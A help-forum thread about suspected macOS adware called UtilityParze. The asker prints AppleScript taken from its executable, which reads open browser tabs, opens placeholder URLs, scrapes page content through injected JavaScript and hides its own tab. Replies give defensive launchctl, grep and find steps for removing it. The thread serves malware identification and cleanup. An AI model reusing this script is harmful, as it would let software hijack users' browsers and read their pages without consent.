What is UtilityParze?

2

I’m using a MacBook Air with OS X Catalina.

Today when I opened Safari a security dialog popped up asking whether to allow UtilityParze to access Safari. I haven’t found any mention of this application online so far, but I found an executable at /Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParze in my filesystem.

It’s mostly not human-readable but here’s some embedded script:

if application "Safari" is running then 
    run script "tell application \"Safari\" to return URL of front document" 
end if

if application "Safari" is running then 
    tell application id (id of application "Safari") to open location "[URL_TO_OPEN]" 
    tell application id (id of application "Safari") to activate 
    delay 5.0 
end if

if application "Safari" is running then 
    run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window 
    tell application id (id of application \"Safari\") to open location \"[UA_URL]\" 
    tell application id (id of application \"Safari\") to set the content to the text of document 1 
    repeat until length of (content as string) is not 0 
        delay 0.2 
        tell application id (id of application \"Safari\") to set the content to the text of document 1 
    end repeat 
    tell front window of application \"Safari\" to close last tab 
    tell front window of application \"Safari\" to set current tab to tab activeIndex 
    return content as string" 
end if

if application "Google Chrome" is running then 
    run script "tell application \"Google Chrome\" to get URL of active tab of first window" 
end if

if application "Google Chrome" is running then 
    tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]" 
    tell application id (id of application "Google Chrome") to activate 
    delay 5.0 
end if

if application "Google Chrome" is running then
    tell application "Google Chrome"
        open location "[UA_URL]"
    end tell
end if

if application "Google Chrome" is running then 
    run script "tell application \"Google Chrome\" 
    set the activeUrl to get URL of front window's active tab 
    open location \"[UA_URL]\" 
    set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\" 
    repeat until length of (content as string) is not 0 
        delay 0.2 
        set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\" 
    end repeat 
    tell front window's active tab to close 
    set tabIndex to 0 
    repeat with currentTab in (tabs of (front window)) 
        set tabIndex to tabIndex + 1 
        if URL of currentTab is activeUrl then 
            set (active tab index of (front window)) to tabIndex 
            exit repeat 
        end if 
    end repeat 
    return content as string 
    end tell" 
end if

Has anyone heard of this program? So far I just denied it access but have not deleted it. I’m guessing it’s something annoying that initially reroutes to a page when I try to open a browser.

owengall

Posted 2020-01-12T15:19:16.953

Reputation: 43

Saw same thing this morning. Was warned about it so I deleted it. A Google search only returned this post, seems you're the first person to mention this on the internet. – David Lartey – 2020-01-12T16:14:46.007

I would run an antimalware/antivirus scan. – vssher – 2020-01-12T16:41:46.953

Answers

0

I just (Sunday Jan 12, 2020 at about 9:52 am) had a similar "Utilityparve" prompt appear in Mojave asking for permission to access Google Chrome. I did not allow access.

I have had similar mysterious browser access requests in the past that were connected to adware that I had to manually clear out of the system.

"Macperformance" is an example that seems to repeatedly find its way into a very similar location in the "Library" of the active User. I don't know whether there's a direct connection between "UtilityParve" and "Macperformance", but right now both of them are present in my Library.

"Utilityparve" is located in the "UpdatesMac" folder, whereas "Macperformance" is located in the "UpdateMac" folder.

Based on the lack of a description of its function online I will delete "Utilityparve" as well as "Macperformance" which is considered to be adware.

PCH

Posted 2020-01-12T15:19:16.953

Reputation: 16

Yeah, that description including having Macperformance matches mine. I’ll do the same. – owengall – 2020-01-13T14:24:07.360

3

Have you tried running e.g. launchctl list | grep Utility in a Terminal to see if a launch agent is running that in turn keeps the application running? If so, you should probably run launchctl unload com.UtilityParze (or whatever the identifier/name that shows up when listing previously) to make sure launchd does not try to keep the application alive, then delete all related files. launchctl list com.UtilityParze should give you a hint on what/where those files are.

The three most likely locations for the .plist definitions of this launch agent are:

  • /Library/LaunchAgents
  • /Library/LaunchDaemons
  • /Users/markus/Library/LaunchAgents

Look in all those folders for com.UtilityParze.plist. But they might use a stealth name so inspecting via launchctl is probably better. Another option is to grep for the suspicious name in all .plist definitions, something like:

  • grep -R Parze /Library/LaunchAgents
  • grep -R Parze ~/Library/LaunchAgents
  • sudo grep -R Parze /Library/LaunchDaemons

Launch agent definition files must include the path to an executable to do anything and if the malware creator didn't spread the files over many locations, all offending files are probably in one folder somewhere along with the executable. Find the executable and you'll probably find all other files to delete as well. But make sure to unload the agent first.

Yet another way to hopefully spot the malware files is running find on all of your libraries:

  • sudo find /Library -iname '*Parze*'
  • find ~/Library -iname '*Parze*'

Markus Amalthea Magnuson

Posted 2020-01-12T15:19:16.953

Reputation: 223

Thanks for the very helpful tips! I was not aware of how to find launch agents before so this will be helpful for identifying viruses in the future too. – owengall – 2020-01-13T14:30:07.737
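The lookup described in the answer above, as an added example that is not part of the original thread: it lists each launchd job definition together with its Label and the executable it starts, matching on the content of the definition rather than its file name. The function names, the sample file name and the sample Label are hypothetical; `plutil` is the macOS tool used to read binary plists.

```shell
# Added example (not from the original thread). Emit a plist as XML: plutil
# (macOS) also converts binary plists; without it the file is assumed to be XML.
plist_xml() {
    plutil -convert xml1 -o - "$1" 2>/dev/null || cat "$1"
}

# From XML on stdin, print the first <string> after <key>$1</key>
# (the value itself, or the first item of an array such as ProgramArguments).
first_string_after() {
    awk -v key="<key>$1</key>" '
        index($0, key) { seen = 1; sub(/.*<\/key>/, "") }
        seen && /<key>/ { exit }
        seen && match($0, /<string>[^<]*<\/string>/) {
            print substr($0, RSTART + 8, RLENGTH - 17); exit
        }'
}

# Print "plist<TAB>Label<TAB>executable" for each job definition in the given
# directories whose content matches $1 (case-insensitive; empty = list all),
# so a job with an unrelated file name is still reported.
list_launch_items() {
    pattern=$1; shift
    for dir in "$@"; do
        for plist in "$dir"/*.plist; do
            [ -f "$plist" ] || continue
            xml=$(plist_xml "$plist") || continue
            printf '%s\n' "$xml" | grep -qi -- "$pattern" || continue
            label=$(printf '%s\n' "$xml" | first_string_after Label)
            prog=$(printf '%s\n' "$xml" | first_string_after Program)
            [ -n "$prog" ] || prog=$(printf '%s\n' "$xml" | first_string_after ProgramArguments)
            printf '%s\t%s\t%s\n' "$plist" "$label" "$prog"
        done
    done
}

# Constructed sample: hypothetical file name and Label; the program path is the
# one from the question with "me" standing in for the user name.
make_sample() {
    cat > "$1/com.example.helper.plist" <<'EOF'
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.helper</string>
  <key>ProgramArguments</key>
  <array><string>/Users/me/Library/UpdatesMac/UtilityParze/UtilityParze</string></array>
</dict></plist>
EOF
}

sample=$(mktemp -d) && make_sample "$sample"
list_launch_items parze "$sample"  # real use: Parze /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents
rm -rf "$sample"
```

Calling it with an empty pattern lists every job in the given folders, which helps when the name to search for is not known.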

0

An app named 'Easyfind' can search for the file very easily. I just searched for 'UtilityParze', and it output 4 results. I deleted them all at once.

buyuno

Posted 2020-01-12T15:19:16.953

Reputation: 1